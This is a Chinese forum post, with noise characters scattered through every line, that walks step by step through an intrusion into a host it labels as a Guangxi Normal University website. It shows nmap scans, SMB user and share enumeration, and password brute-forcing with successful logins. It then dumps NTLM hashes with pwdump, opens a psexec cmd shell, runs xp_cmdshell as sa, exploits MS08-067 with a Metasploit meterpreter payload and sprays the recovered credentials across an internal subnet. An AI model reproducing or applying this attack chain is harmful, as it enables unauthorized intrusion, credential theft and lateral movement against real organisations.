广西师范网站http://202.103.242.241/" g# _, Y! Y/ S: X0 U' \! A Q5 z
2 _& X% r/ P- Z! B. I5 ~root@bt:~# nmap -sS -sV 202.103.242.241
8 p, Q0 A; ^6 x$ I0 s) @* ~ |+ F4 G: Y' \, ~, T; h1 S% ^
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
7 \* ^* J" u. T9 C* F
/ c) [- }! ?' [. w5 G( _Nmap scan report for bogon (202.103.242.241)& ^; R) Q0 U0 N" H* H A
; T# \2 [& l. s# T
Host is up (0.00048s latency).+ o* \% ]' B6 F. `( H0 [
3 [& [. E' T6 H# z' O* c0 I, L0 y0 w
Not shown: 993 closed ports @6 z: d+ a0 ~+ s( c/ K1 Y3 z- U9 X
1 H0 N* g( C6 l1 `PORT STATE SERVICE VERSION
, X8 z% M; G1 M( U0 t. E% { w5 c
0 R( z9 l/ e( H9 B: o7 }135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)% k* q1 {! L* P! g8 T$ {
, E, c4 C$ P: b139/tcp open netbios-ssn; x" X" Q& ~, d
( F; {8 c) K R O
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds, ~5 h% r9 X3 C7 }
3 s) c+ e8 ~1 C; e
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe); f5 w9 R: E8 A1 R' U
' C1 w7 M, E' i% ~3 l
1026/tcp open msrpc Microsoft Windows RPC
: n3 B' M# Z! V+ X. X0 \) h* W9 [& q" g
3372/tcp open msdtc?
8 I5 a4 l' o7 Q6 D
$ O q. W- H& v7 D, k9 a* L3389/tcp open ms-term-serv?3 w) w8 R( k+ N. r8 v
1 {' }9 g p0 u6 Y: S; T% \1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
7 A! W8 d$ n, E4 ]' VSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r9 e: u- J# C5 Q7 V# H& [
) ^$ O% e) t2 |$ h9 P1 A
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
& Z1 h+ O) C1 p% ^, F6 R" ]! { V9 P& `3 h
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
& t6 B5 v+ W7 {: `$ P8 H& v* | |3 w& H9 m
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO% {/ l' [6 Y/ B0 s9 y
) _: U$ {3 H2 X. ^% x3 G
SF:ptions,6,”hO\n\x000Z”);
R$ Y2 F6 m( T
, v1 \1 b% q& g7 v2 p! tMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
9 n4 S& a) o( ]2 _3 \) |6 y2 Q1 \7 O& a3 `: S5 L: Y
Service Info: OS: Windows" c$ O9 y) B7 A9 D/ Z
9 ]$ @+ Q s1 a% G( M* U8 TService detection performed. Please report any incorrect results at http://nmap.org/submit/ .( Q% F, f& c( x) P% Y& \
6 a5 S/ N8 O* ^$ _+ f- E9 z7 u
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds' l1 [6 Y8 n4 S* B( q
7 b+ Z( }* Z" d, croot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
# D8 F( y; }+ P. _5 v
: ]! n R) J2 k' |8 b-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
" O3 ?: |5 d; w# j: F
# G; F! S3 @+ {-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
9 ?- j5 u2 C( W/ x% Y! A& a; l, M- E2 Z+ m# _
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
7 d. f- c+ ?& R2 O. V7 V. g" g) Z9 `' O* x, e: y
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
( N/ \) M) N9 n7 o' R% j: a0 f% x1 X2 N7 P% t5 b$ H
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse% {* m1 N* v {7 L& R
9 h% s0 v6 B0 T. B-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse) p# L8 j' `: }; Q2 F
% n$ C Y6 q# c q& e+ V$ `-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse' P0 J q% G' o) U4 a. S
7 c1 k K* [" ~" L# X, O( H& m
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
" ]9 K; f! l; ?% g( _* j6 [/ I1 c6 o+ V* H# C- ^( G" R: J* D
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
0 C2 q' c# y" Y& F( `
* Q1 x0 u5 }. A8 F-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse P& e- A# a5 m* m9 z j+ e
$ P' q" J& q3 {1 t% ?3 {
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse$ M1 D1 S8 c; J. J' D" |) I0 {
# o! `1 U7 h+ _-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
* v7 ?) @# u$ ?4 l, ]3 p7 l' V2 |7 t" Q. N) ?
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse9 v+ z% W, J: H
+ v( G4 R" q E& U0 i
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse5 \ G( b% A6 \# `
( {' ^7 T! x9 a6 U7 y s-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse' C: S- u* _2 W A
5 @9 L R; P3 X Q% K
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
5 q4 E9 D+ g2 i# @( O4 J9 ^3 k; c# [+ f+ m! n9 R# W) N8 r
//此乃使用脚本扫描远程机器所存在的账户名" b, ~# o4 a8 W' @5 F' k3 Y9 I" d4 B
! d$ v. G1 y7 tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
- ~; `1 z) y$ g( n$ p# n- D c6 G! ^, `3 @2 p3 J0 Y
Nmap scan report for bogon (202.103.242.241)0 q0 Y: F% v( k; o% {" I8 |
% Z: v+ ]' B% N
Host is up (0.00038s latency).3 x& S ^2 V! ~8 t- ^
$ C/ Y1 O& M( P' O$ P
Not shown: 993 closed ports7 Q0 i( ^; r1 ~
H# [) n: [. U% k+ m# BPORT STATE SERVICE
7 N/ p- Q; l3 ]: _$ g' G" e2 e) s1 g
135/tcp open msrpc* p9 d( ?- E9 a
0 N. `3 a7 h X& E139/tcp open netbios-ssn W2 H( Q% y) j' N
8 ~4 j4 p" z. V/ B% u! i
445/tcp open microsoft-ds
, \. r* n5 Q3 p+ v7 h
8 c* K, l/ ?! i1025/tcp open NFS-or-IIS
2 P; Y" s0 t% O! t4 H- j# {) ?0 ~3 ?
5 X: }3 w% f" N% _8 l' D) A1026/tcp open LSA-or-nterm8 B6 b, e( D1 U1 [5 t! l
. ]" ^- b$ \ W! a, h/ w2 z3372/tcp open msdtc
7 R% ~. [, f/ p" C/ p, o% o" l) z# ^. s
3389/tcp open ms-term-serv- w, R! a k: z) Y" U8 S& u' {# K
% T D- u; P' d5 a5 K: F6 J' p- V ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 @3 ?% b# z% r, Y# w; _
b7 |$ Z5 l3 F0 C! Z+ e0 tHost script results:. \* @1 S" F& Z& @
, }# o: _; p7 R/ `( X9 D| smb-enum-users:
. l0 o* c, C8 l0 n. `6 ^$ ^
# O# f( A( I) }, Z|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果* g4 x ?: p' p1 i G, s( H
! T1 w- j5 g5 s8 q; {) P4 o |Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds+ r9 s4 B% F, J% T
8 E) v+ w' b: w* I( Z
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
6 k6 y- `0 }( ^( a5 O5 Q4 C$ W% ~* x) i7 _4 A, l
//查看共享
( c4 R3 z8 k7 I P: M1 \
4 Y, q& f2 |- L& ^# Y- ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST- @, R& j* u. {8 J
- a3 l+ E$ U' H
Nmap scan report for bogon (202.103.242.241)
; G: X+ M. m% `4 V+ H9 ?( Q) ~; a3 c, l
Host is up (0.00035s latency).
# {, |" B7 G$ d) `$ `* t% E, A) s7 A! r' L
Not shown: 993 closed ports) t+ c3 u- P+ @8 g! x. I+ u
2 g9 B2 Z5 Z; R8 O! @7 y. @PORT STATE SERVICE
" u/ s* i8 \* B( J* m( A1 ~! @+ x/ j+ U5 N/ \$ F5 t, C: O
135/tcp open msrpc$ H8 V: ?1 Y b) Y/ X v- s3 M m+ |
( K+ o T5 J. {1 x* q
139/tcp open netbios-ssn3 I: |5 c& r5 ~6 h& e
- {* i" t) } O$ o n445/tcp open microsoft-ds
; O M) J% c' n0 e8 e# q* _. a) [. o% m4 E
1025/tcp open NFS-or-IIS
5 E* e4 P) F# @# y
k2 a( L* y- J S n0 O) V1 M1026/tcp open LSA-or-nterm
: R* {0 q: m3 q0 V+ b4 N
; Y; ~; J# j5 |8 Y4 B7 ~3372/tcp open msdtc* ~/ S" J5 D1 b- U5 k6 E2 I( O
- a( C M9 @ w# c3389/tcp open ms-term-serv
- q1 l, j* f9 o& a2 n' y8 g; x: m9 o6 }9 Z2 a
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! p6 ?* U& L+ F+ u
2 J& F( h( x5 h! [3 ]0 fHost script results:
# U6 [1 c. k* M2 W8 `8 Q( @
4 D* n- L2 B$ ^# Y1 i3 S| smb-enum-shares: s6 R) D) y1 f; O
! h0 p" O0 n% L! K4 n
| ADMIN$' s' S) P* @& e" o7 G+ B7 J" G
' S- n8 d8 t x! K- L0 f| Anonymous access: <none>( b* G" f; ^! T6 T* c' Z' O
4 X) @" x9 B# O| C$5 ^+ P3 L9 W& r; `$ {# z# [
5 D5 C) t+ ?8 C* g, `/ G. j x. N
| Anonymous access: <none>
5 g4 @2 x R$ B4 q/ E; x; U7 c
! Z z! b: A- C' |. y) X1 ^| IPC$
( @$ i' F0 k5 f. l5 c( z$ h' B8 q: a# T0 f. p, c! _6 T) @) W
|_ Anonymous access: READ9 W7 o7 S( k% j' f3 N( p
5 d2 P0 u: s& J2 G( ~2 i3 V
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds, i4 u' u, x$ B
7 `: j1 i) J. k/ n
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 . C( m# l' E9 L- F
; x9 D! S# @# G" b2 A! _//获取用户密码, S W' |; k2 F# U5 ~9 ~6 |+ E
$ ^; ~ w; J/ E# e( e. q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST. W( S0 i; b% V: y8 g J
$ h. @$ e2 H* L9 b; ^( a8 JNmap scan report for bogon (202.103.242.2418)! n' s# c/ d: B/ A* ~! H' a
- _: ]2 D& N0 I
Host is up (0.00041s latency).# G1 Y# a/ Q* g
: l6 w1 {6 y% J7 rNot shown: 993 closed ports
, T/ M1 y9 q# R; Q
- }/ @9 F1 j& ~& L2 ]PORT STATE SERVICE
6 a7 k' m/ y6 N5 A0 [! S; g- ]3 d K9 c$ y
135/tcp open msrpc
, a% |. x7 v" Z& \- D
# ?( M1 R3 B# I* W3 S* w0 N139/tcp open netbios-ssn
6 s0 L4 O: z# z4 p7 c0 B
7 _# K' t' R b5 h0 R445/tcp open microsoft-ds
0 U: {* _% C4 L, l' C% q3 q' ] g' h) @
1025/tcp open NFS-or-IIS
% ^% x4 v# @' D! s8 s3 T2 ~$ R9 I" e
1026/tcp open LSA-or-nterm
9 C: o) n( V" r0 X
8 C9 i2 q- J q5 N3372/tcp open msdtc
( F( n O2 U$ Z) R7 p) f3 K4 f, g" }/ E+ L
3389/tcp open ms-term-serv+ ^: b' E" c8 n Q) J9 {7 B
. O( D1 @& W: ]9 B5 l% jMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! g% @+ U6 ^" V7 ]1 H% H* a9 G: u. f" n' t' I2 v4 U' z! @$ F( X& @
Host script results:: H. q# N- l. z! V
9 {0 {* t. ]0 R9 y4 a5 l| smb-brute:* _* S0 p; W% S/ {4 a2 O1 P- {
) \8 L" [6 l0 ]! g* cadministrator:<blank> => Login was successful, m; ?' C6 j ?: q
* w; H- i0 u5 D& _% H|_ test:123456 => Login was successful. e2 g+ k3 }# g
* [1 V' I) z& M2 p
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
7 {) Q( W' I. p- z* \
3 C' j2 r* {3 w0 |) S* G$ xroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
! c, ?! Q1 u! y/ N' n' |4 }; _! M. A' [ J) N5 H
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
' f4 h0 x! T, Q+ v+ I7 M2 P* e$ v2 [/ Q& A/ g$ w
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse9 i3 M8 _3 ^, V: o
2 v; l3 \( ]9 R, p. M1 \root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
: y. E- @' r6 y$ G- F0 I) M- d% }$ \" O1 R, _4 R+ ]$ n
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST) @3 q5 _' q0 @5 Q
4 p! L" J+ ]1 I- @7 ~" U0 ONmap scan report for bogon (202.103.242.241)
' f' c- t% u0 K' ^, K8 A/ v! ^( H) G5 D, l% Y. [1 p
Host is up (0.0012s latency).% ]- G* T1 G' D; g
* ^9 p+ E2 A& h. h. H2 l' T3 WPORT STATE SERVICE
1 o5 f9 y& w% i/ N& q9 Q. P! I g6 `. t. ^
135/tcp open msrpc
8 j% @, q5 K+ ^0 U( x5 F% ^& R% |5 D0 {5 @8 }) n7 ?
139/tcp open netbios-ssn
) f; `7 K3 ?1 M1 t% y
! L" Z" ^5 e1 K445/tcp open microsoft-ds) Q7 i8 [# q q9 W v1 U6 h7 N) `9 u
4 I$ [2 S% Z' O* B4 L! `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* |% K% L) o8 e7 V# R! \: w0 x: B; \# V/ d2 T6 l$ r5 G) N
Host script results:
9 ]. f/ [! t4 T- {1 k: Q# b
% \0 N' [4 D( b% W2 _1 ]| smb-pwdump:5 [% ~' c3 l3 d6 X+ e" k& T/ D( l
1 T8 ~& l6 j8 M) h5 J; b P( \+ P || Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************/ ~5 m2 t" R! q3 K) O E
{# G+ G, e5 I+ M2 J2 P( R. ?; n| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
: R# \- ^; L9 l# |
8 \: D1 R. y4 g! q9 C$ i5 m* F| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
! {+ b4 ~7 F/ P$ q- @* t; a! W
5 h7 |6 q2 Z2 [6 a; }0 j|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D28 t s6 d7 b9 j, Z @" v* h
1 Q) i @5 g: `- U
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds @) t( t# |& C
4 g" E0 | a7 D: B6 g7 Z
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
3 v! c* n* U+ Y! I6 Z
8 y9 ]5 z5 @# X-p 123456 -e cmd.exe
# G5 P0 r7 p m+ |0 x7 B2 o
+ E' D7 y7 a* Y( e* U2 c& y- UPsExec v1.55 – Execute processes remotely; T+ x& M# X5 R! r
4 j0 l/ g8 ^1 X8 V! CCopyright (C) 2001-2004 Mark Russinovich( _( ^( D0 @8 C5 b5 \) p0 p% ]% W
8 L( p) g# i/ \1 m6 c
Sysinternals – www.sysinternals.com
0 k( E4 i- b8 ~' p. [/ Q/ d
7 Z A- U4 g, t$ R1 y* D6 V0 V; c$ AMicrosoft Windows 2000 [Version 5.00.2195]
5 }/ I1 D, k! J1 r
9 c% o" J( `0 H' A( D(C) 版权所有 1985-2000 Microsoft Corp.: X0 V$ ]3 g5 f
3 U7 E/ p: z# R P
C:\WINNT\system32>ipconfig
T$ h+ J9 A# W6 r( {( O. G1 y& r& H* |, }/ b& m- b
Windows 2000 IP Configuration i( i7 @% N: q4 V0 Z
- J6 j6 V+ o1 f! e$ B! W& l5 ?Ethernet adapter 本地连接: J2 p4 x4 z, Y2 Y& c( B. a' @' E
+ v7 U- o9 q% P% q) u9 m. WConnection-specific DNS Suffix . :+ `4 H' @) o$ _5 p: f
; O) x8 X1 o2 P( y( \IP Address. . . . . . . . . . . . : 202.103.242.241
0 W) }- n* ~8 s+ g+ v( b! d! W: R+ @
Subnet Mask . . . . . . . . . . . : 255.255.255.0' m E/ J; t8 ~, O1 ~
. S) f3 @5 d8 W' h) oDefault Gateway . . . . . . . . . : 202.103.1.1" F# W6 E3 M7 c9 w' J; y* u% k
, e D# |! j/ i5 BC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
0 @! y# w, Q- ]7 V2 F1 u- @/ X% n! V4 {! E- O
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞" n2 [+ C6 j3 i* |% E
# S& G# }8 j6 r/ v/ k& X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST2 {' ^* I/ y! u
! Q1 E5 j5 a6 z* @- wNmap scan report for bogon (202.103.242.241)
$ } E7 }3 T& H! ~
/ M- O6 D. [. dHost is up (0.00046s latency).
$ l8 z1 M8 _6 c/ S8 s
- a% ~ U0 {7 {: \6 e, @, LNot shown: 993 closed ports, n2 M$ }7 A0 S. i' d, ~
6 X* ?$ _) [- h( R3 `. a5 A
PORT STATE SERVICE1 s' b9 e8 k; i* G6 g
" A9 j) A) H$ M$ ~* }2 W135/tcp open msrpc
( {. e3 b" |# Z9 C" c& o/ m9 _1 R9 }
* V& G3 e+ g; K$ P% D: _, X& _139/tcp open netbios-ssn
/ L% {) I ?' W7 U8 j2 `2 o8 l$ u9 @
445/tcp open microsoft-ds7 Z: D' b4 c, y% p- a- q
0 b( v7 G1 m8 E: |/ A* v% `" H
1025/tcp open NFS-or-IIS
5 N0 V6 {# V! Y% j' G I* k
8 Y" t( L2 H4 C4 a$ s7 `; j5 E1026/tcp open LSA-or-nterm7 {; w; q2 q$ l# U
; `9 W% T" h. a4 C3372/tcp open msdtc! G+ O1 ^) z! u2 b3 x. _
) d1 B. T4 k* x/ G/ m
3389/tcp open ms-term-serv
7 c: h5 P9 H0 p: j& \ d1 s6 Y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)" q- v. g4 X1 k% H& f. u9 x
! T; h7 I7 \8 z$ e& H. _Host script results:
8 I: ?; |( S9 B
1 D c" W |. w4 f( A( @ k| smb-check-vulns:7 h- r5 c0 K, {$ c: @- R% U0 G: j
: K' d5 e- k; G- P% V; G|_ MS08-067: VULNERABLE
8 G/ S- u, X1 y8 b1 s& v8 N0 m5 _# w0 A3 b" Z2 m
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
# C3 n# C j( i! O; d5 @5 q5 l9 [" W" ] [& Y
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
8 k$ M( e# A$ R4 c
* O$ B3 E/ r7 n5 C- t* _msf > search ms08
: i6 I0 X g7 O* `" Y l- @" a; J- `) j
msf > use exploit/windows/smb/ms08_067_netapi X$ N/ U& i8 e- S, H1 ]8 A
( L4 z. U' _+ hmsf exploit(ms08_067_netapi) > show options3 X- W1 e: y2 D( W7 o
# }2 m) N( [# Fmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241# Z6 T: q+ |0 p/ ~( ?0 Z# U" J7 n d
0 G; k* P3 n( G( ^. [
msf exploit(ms08_067_netapi) > show payloads
4 X/ H: H* P. U. |1 `, C: `, m* K1 P3 x! W% r
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
. h4 N, B$ x! ]' [7 n# N
9 [$ b) s- w- L: mmsf exploit(ms08_067_netapi) > exploit
6 I' S: ^8 ~3 |# H1 O9 I5 B! p- n- d2 L6 H2 D* M
meterpreter >& R* d1 b# Q$ W; g: G! y7 U% R+ J
E5 i; G- i$ ]5 y- ]* n' F5 W
Background session 2? [y/N] (ctrl+z)
. j1 y" P5 l1 g R5 |! k/ w6 ?% o+ t4 {! k) D- u9 D5 @
msf exploit(ms08_067_netapi) > sessions -l
' F; q/ n9 u U r$ D& p: U
0 q& s2 S+ L: proot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
# g+ r T+ U% l% R3 s
. Z, ~3 m6 v9 p z/ C7 T% F- mtest
1 p" e4 n8 T' M0 }) ^1 }+ v, h% C0 V! S- h
administrator( ~. H3 C c. a3 c
4 y2 B: p4 S4 N; p3 c2 O; @; c) C
root@bt:/usr/local/share/nmap/scripts# vim password.txt
+ {+ M9 K& M7 V& z8 L: j
@/ i! N/ t! A0 A; |; a \44EFCE164AB921CAAAD3B435B51404EE
& i2 u; D3 Y! r& y- M
. t V9 m9 s" j* _root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 & w6 p& ~# {3 O: W0 T4 X
* `9 ~8 i) L6 b2 z- x
//利用用户名跟获取的hash尝试对整段内网进行登录
[& i2 m1 _( k$ {$ s: x9 u
6 f& u7 `4 Q' {- Q8 B, `9 aNmap scan report for 192.168.1.105
6 J* e) R- p8 `0 m9 D J, @1 g9 ?- ^1 M; G% p+ p, |
Host is up (0.00088s latency).: ?$ K* r! j7 E' H% x6 H
3 A- T* \2 Y* g+ LNot shown: 993 closed ports; D7 Y/ z0 ^- ~$ f2 w" n0 z+ Q( j- `& E
; W* G' d( Y% A# D0 j8 j6 J
PORT STATE SERVICE
; `# W! t4 H" G1 |' S( n* y3 s8 a Q% q& z6 V2 C1 K
135/tcp open msrpc
5 [" m/ j) v" M( W9 \! u
( N9 @$ r) v# g3 g- L9 f& u% l. O139/tcp open netbios-ssn
' s# ]2 f3 M0 e' c; M$ @
9 K0 ]( [9 F8 P5 ~3 w+ ]445/tcp open microsoft-ds
$ o/ K3 j2 I6 M( L u! a {5 P& _8 Z) G
1025/tcp open NFS-or-IIS' K8 V7 t9 f! ?" `+ |
6 [) E- \- m. q# E6 y8 a. ~) c" N
1026/tcp open LSA-or-nterm# k; q& `' L D& C
7 Z: a8 l* @; l0 h3372/tcp open msdtc, x3 D0 x; Q+ E3 x1 ^8 e, o1 L
# v9 X6 Y3 M- o0 L# y3389/tcp open ms-term-serv
8 r+ t' O- t% s" _7 u# P6 k5 }( Y4 U8 @# M* {# _! x
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# a {3 L1 J9 s( [. E# E4 ?! x3 ~% G
9 u' ?3 ]9 f# Q2 _( ?1 W& C4 H
Host script results:9 g6 X1 W5 B. V, z! Z6 Q0 T
% @2 }# ?$ f8 W% y" L7 \+ g* ~, j
| smb-brute:
h) R1 F7 k& H9 G
6 C2 [$ v2 g7 @& m2 R+ L" ]|_ administrator:<blank> => Login was successful" ]7 v. x& K% z
$ t! Y2 L: r, }$ Q2 ~3 v$ u攻击成功,一个简单的msf+nmap攻击~~·1 A7 P/ W$ U% r- B2 J% U0 m+ d m) V
6 b6 R. I. Y5 b- r# L+ Y. U q4 E |
发表于 2012-12-4 12:46:42
收藏
支持
反对